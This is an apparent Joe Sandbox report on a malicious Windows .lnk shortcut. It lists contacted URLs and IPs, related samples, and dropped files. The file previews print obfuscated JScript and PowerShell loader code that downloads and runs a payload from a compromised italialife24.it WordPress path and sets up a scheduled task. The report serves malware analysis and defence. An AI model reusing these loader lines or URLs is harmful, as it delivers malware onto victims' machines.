                    https://www.italialife24.it/wp-content/uploads/2021/05/untwscript.exe, 0000000B.00000002.2304624356.000001D583AC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.2272407896.0000019E82FC5000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 00000014.00000002.2964143111.00000214CC987000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Iconpowershell.exe, 00000014.00000002.2964143111.00000214CC987000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://github.com/Pester/Pesterpowershell.exe, 00000014.00000002.2833335947.00000214BE174000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.phppowershell.exe, 00000000.00000002.2192952183.00000199EA665000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://www.microsoft.co)powershell.exe, 00000000.00000002.2196342208.00000199ECAEB000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.italialife24.it/powershell.exe, 00000014.00000002.2827426779.00000214BA8FA000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.italialife24.it/wp-content/uploads/2021/0wscript.exe, 00000007.00000002.2210475240.0000020281BC5000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/powershell.exe, 00000014.00000002.2964143111.00000214CC987000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2189643133.00000199901B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2169173026.0000019981A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2189643133.000001999006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2252312929.0000026618E67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2415007234.0000026627741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2415007234.000002662760B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2245540270.0000015252CE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2398207318.00000152615C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2398207318.000001526148B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2833335947.00000214BE2E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2964143111.00000214CCACA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2964143111.00000214CC987000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://oneget.orgXpowershell.exe, 00000000.00000002.2169173026.0000019981757000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2252312929.0000026618B9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2245540270.0000015252A57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2833335947.00000214BDF65000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.phwscript.exe, 00000004.00000002.2185643040.000001EE7BEE5000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.phppowershell.exe, 00000014.00000002.2979838151.00000214D4AF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://www.italialife24.it/wp-contentwscript.exe, wscript.exe, 00000013.00000002.2782486876.0000015B0FC55000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://aka.ms/pscore68powershell.exe, 00000000.00000002.2169173026.0000019980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2252312929.0000026617591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2245540270.0000015251411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2833335947.00000214BC921000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.italialife24.it/wp-content/uploads/2021/05/awscript.exe, 00000013.00000002.2782486876.0000015B0FC55000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1wscript.exe, 00000017.00000002.2856582097.0000020104925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000017.00000003.2854626485.00000201046CC000.00000004.00000020.00020000.00000000.sdmp, 241XU6KV2DFH.js.8.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2169173026.0000019980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2252312929.0000026617591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2245540270.0000015251411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2833335947.00000214BC921000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://crl.vpowershell.exe, 00000000.00000002.2195200172.00000199EC795000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.italialife24.it/wp-cwscript.exe, 0000000B.00000002.2304624356.000001D583AC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.2272407896.0000019E82FC5000.00000004.00000020.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://oneget.orgpowershell.exe, 00000000.00000002.2169173026.0000019981757000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2252312929.0000026618B9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2245540270.0000015252A57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2833335947.00000214BDF65000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://italialife24.itpowershell.exe, 00000000.00000002.2169173026.00000199816BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2169173026.0000019981650000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2252312929.0000026618B68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2245540270.00000152529EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2833335947.00000214BDEFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.italialife24.itpowershell.exe, 00000000.00000002.2169173026.00000199816BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2169173026.0000019981650000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2252312929.0000026618B68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2245540270.00000152529EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2833335947.00000214BDEFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.phppowershell.exe, 00000000.00000002.2192952183.00000199EA665000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              46.254.34.201
                                              		italialife24.itItaly
                                              		52030SERVERPLAN-ASITtrue

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1567190
                                              Start date and time:2024-12-03 09:14:04 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 5m 27s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:24
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:mX3IqRiuFo.lnk
                                              renamed because original name is a hash value
                                              Original Sample Name:e02e837f8b43f14dd1de0c924fb9c7c2ead99fe1589bfb5126f120be5bc8599b.lnk
                                              Detection:MAL
                                              Classification:mal100.expl.evad.winLNK@28/13@1/1
                                              EGA Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 4
                                              • Number of non-executed functions: 2
                                              Cookbook Comments:
                                              • Found application associated with file extension: .lnk

                                              Warnings

                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target powershell.exe, PID 4176 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 5464 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              03:14:54API Interceptor128x Sleep call for process: powershell.exe modified
                                              09:15:00Task SchedulerRun new task: HAoyOEGl0 path: wscript s>C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              46.254.34.201http://bellantonicioccolato.it/wp-content/uploads/2020/11/gutweedtE.exeGet hashmaliciousUnknownBrowse
                                              • bellantonicioccolato.it/wp-content/uploads/2020/11/gutweedtE.exe

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              SERVERPLAN-ASIT6K2g0GMmIE.lnkGet hashmaliciousUnknownBrowse
                                              • 46.254.34.201
                                              G9eWTvswoH.lnkGet hashmaliciousUnknownBrowse
                                              • 46.254.34.201
                                              la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                              • 193.70.147.14
                                              Ordine Electricas BC Corp PO EDC0969388.batGet hashmaliciousGuLoaderBrowse
                                              • 185.81.4.143
                                              Play_VM-Now(Gdunphy)CQDM.htmGet hashmaliciousUnknownBrowse
                                              • 93.95.216.8
                                              Steel Dynamics.pdfGet hashmaliciousUnknownBrowse
                                              • 93.95.216.8
                                              citibank_0824_statement.lnkGet hashmaliciousUnknownBrowse
                                              • 46.254.34.201
                                              https://www.bellantonicioccolato.it/wp-content/uploads/2020/11/gutweedtE.exeGet hashmaliciousKoiLoaderBrowse
                                              • 46.254.34.201
                                              http://bellantonicioccolato.it/wp-content/uploads/2020/11/gutweedtE.exeGet hashmaliciousUnknownBrowse
                                              • 46.254.34.201
                                              https://www.baidu.com/link?url=PR7h_t_ZizoWZdjSMLubWVmCX_p6239c2z0KzH4cKS_&wd=ZC5rZW5uZWR5QGNoY2ZsLm9yZw==Get hashmaliciousUnknownBrowse
                                              • 46.254.36.239

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              3b5074b1b5d032e5620f69f9f700ff0e6K2g0GMmIE.lnkGet hashmaliciousUnknownBrowse
                                              • 46.254.34.201
                                              G9eWTvswoH.lnkGet hashmaliciousUnknownBrowse
                                              • 46.254.34.201
                                              INTRUM65392.pdf.lnkGet hashmaliciousUnknownBrowse
                                              • 46.254.34.201
                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 46.254.34.201
                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                              • 46.254.34.201
                                              P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 46.254.34.201
                                              https://Lakeheadu.hlov.de/Szii3aFWcmivgihoevuc/trTlqgskL4/K3qRQz5Ggziclxgen/t3JiPvu/Szii3aFWcmivgihoevuc/Advising/YSxMdD/lakeheadu.ca/Szii3aFWcmivgihoevucGet hashmaliciousHTMLPhisherBrowse
                                              • 46.254.34.201
                                              http://www.abvt.com.au/netsuite-userGet hashmaliciousUnknownBrowse
                                              • 46.254.34.201
                                              http://www.abvt.com.au/netsuite-userGet hashmaliciousUnknownBrowse
                                              • 46.254.34.201
                                              file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                              • 46.254.34.201

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\ProgramData\241XU6KV2DFH.js

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with very long lines (398)
                                              Category:dropped
                                              Size (bytes):1288
                                              Entropy (8bit):5.725607802652281
                                              Encrypted:false
                                              SSDEEP:24:iJr+PoLb+CIzf5j1MVL+kUE+QQAVz9/sqQ1cEE2Rgjzku/uN:ErK0KZVjSVCRH2z9nMbl+Eu/uN
                                              MD5:A2029F891296382BE55B3EE8ABD76CBD
                                              SHA1:62A6456087E64E593BE66EF87098D31CAD0D9E00
                                              SHA-256:828E7CA3824C2E8ED8076314E1DEBD9CA8C1E312B28213354E2A6F758EDDF192
                                              SHA-512:AFE2FA6B5654B65EA8A629A63CD2FE1EA4EABDFE61A6ABD36E0F5ACB93812D9E034024001EB97485B0C0E92531DA6ED0B9FD710B04A087661383E2D1E37689BD
                                              Malicious:false
                                              Preview:var f1="Scr",f2="ing.Fi",f3="stemOb".var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject").var w1="WSc",w2="riPt",w4="eLl".var wsh=w1+w2+".sH"+w4.var bbj=new ActiveXObject(wsh).var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").AddressWidth==64?"SysWOW64":"System32".var rd=bbj.ExpandEnvironmentStrings("%SYSTEMROOT%")+"\\"+fldr+"\\WindowsPowerShell\\v1.0\\powershell.exe".var agn='r'+bbj.RegRead('HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid')+'r.js'.if (WScript.ScriptName != agn) {..var fs5="yFi"..try {..fso["Cop"+fs5+"le"](WScript.ScriptFullName, bbj.ExpandEnvironmentStrings("%programdata%")+"\\"+agn)..} catch (e) {}.}.var mtx_name="7zFLZ322A0V6".var mtx_file = bbj.ExpandEnvironmentStrings("%t"+"emp%")+"\\"+mtx_name.var fs1="leteFi".var fs2="leExis".try {..fso["De"+fs1+"le"](mtx_file).} catch (e) {}.if (!fso["Fi"+fs2+"ts"](mtx_file)).{..bbj.Run(rd+" -command \"$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'ht

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):0.34726597513537405
                                              Encrypted:false
                                              SSDEEP:3:Nlll:Nll
                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                              Malicious:false
                                              Preview:@...e...........................................................

                                              C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):304
                                              Entropy (8bit):5.369209157284226
                                              Encrypted:false
                                              SSDEEP:6:qcYrhvmVs8Gz797cfoK+wiuFIQEFULvrlAZ9HFiVu5h3BbRnK+wiuFXU:HYrhvF8879qo7wixirauIBbRn7wimU
                                              MD5:0FCD9DADCA2CF3ECC8DFAF719768E50F
                                              SHA1:8006E826C1A6DE676CEA409AF8728E41912245CE
                                              SHA-256:C00206F44F453CBC099AD797B1C0840A9FCB41F6EF65DF7C21AA5D5FDA7DF25E
                                              SHA-512:6D386D4294B92C5D564CCB6FB7923C4AD777DE05DEC4CF358D26ECE7C93AFC7CA917F4A403F3ED8C4C89BF7987CEBC8EAF8D5DA6E69FE3B2510BCEC57CFB91AF
                                              Malicious:true
                                              Preview:var fnn = new ActiveXObject("WScript.Shell")..fnn.Run("powershell -command \"IWR -outfi $env:programdata\\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn " + WScript.arguments(0) + " /f; wscript $env:programdata\\241XU6KV2DFH.js \"", 0)

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0gl1kgu4.kqv.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f45x0lb5.rzu.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4f3pmi2.zdk.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pa5gjzmm.aew.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qvhvl0nc.y0a.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w0otm22q.hkd.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ybs0whv4.vlc.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5llsei5.crc.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5e80ae42b9d74ef9.customDestinations-ms (copy)

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):5397
                                              Entropy (8bit):3.4979659364541464
                                              Encrypted:false
                                              SSDEEP:48:C0xmXRedLXuH40YzIXQlHJoSogZoKUYzIXQlLoSogZo+1:C0xmXkudEIQRHIEIQrHF
                                              MD5:11CADE13CE55402BC4DD9AF7FFBC3BF4
                                              SHA1:C3065F0567E3BD48AE41FA2A074F7EB8BA63C3E4
                                              SHA-256:E567ACD8988BE0721453C073D09127DED66F2D4002ADE3391D794E41FA421999
                                              SHA-512:F43BA46A622E4A20A33B625634E10EECE122A9F05F471FB72EFC3DDDE896A66BC1875903BA13596C33BF0507A2D2A3B1B4A9ECE3AD2DE46B5C8911973792A544
                                              Malicious:false
                                              Preview:...................................FL..................F.`.. .......W.../7>n[E....m[E..q............................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........S......W.../7>n[E....j.2.q....Y.A .MX3IQR~1.LNK..N......EW.5.Y.A...........................]..m.X.3.I.q.R.i.u.F.o...l.n.k.......W...............-.......V.............#v.....C:\Users\user\Desktop\mX3IqRiuFo.lnk..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...........................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e..............................................................................................................

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AA3SPT5ZBVZTL0B9KYES.temp

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):5397
                                              Entropy (8bit):3.4979659364541464
                                              Encrypted:false
                                              SSDEEP:48:C0xmXRedLXuH40YzIXQlHJoSogZoKUYzIXQlLoSogZo+1:C0xmXkudEIQRHIEIQrHF
                                              MD5:11CADE13CE55402BC4DD9AF7FFBC3BF4
                                              SHA1:C3065F0567E3BD48AE41FA2A074F7EB8BA63C3E4
                                              SHA-256:E567ACD8988BE0721453C073D09127DED66F2D4002ADE3391D794E41FA421999
                                              SHA-512:F43BA46A622E4A20A33B625634E10EECE122A9F05F471FB72EFC3DDDE896A66BC1875903BA13596C33BF0507A2D2A3B1B4A9ECE3AD2DE46B5C8911973792A544
                                              Malicious:false
                                              Preview:...................................FL..................F.`.. .......W.../7>n[E....m[E..q............................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........S......W.../7>n[E....j.2.q....Y.A .MX3IQR~1.LNK..N......EW.5.Y.A...........................]..m.X.3.I.q.R.i.u.F.o...l.n.k.......W...............-.......V.............#v.....C:\Users\user\Desktop\mX3IqRiuFo.lnk..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...........................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e..............................................................................................................

                                              Static File Info

                                              General

                                              File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Mon Apr 8 20:19:11 2024, mtime=Tue Nov 26 15:01:54 2024, atime=Mon Apr 8 20:19:11 2024, length=455680, window=hidenormalshowminimized
                                              Entropy (8bit):3.382233565250986
                                              TrID:
                                              • Windows Shortcut (20020/1) 100.00%
                                              File name:mX3IqRiuFo.lnk
                                              File size:3'953 bytes
                                              MD5:ef8150f41db3c25684ff13470182898f
                                              SHA1:6a10b98d8cd2fb0fa641d282ea30fc196638b8cd
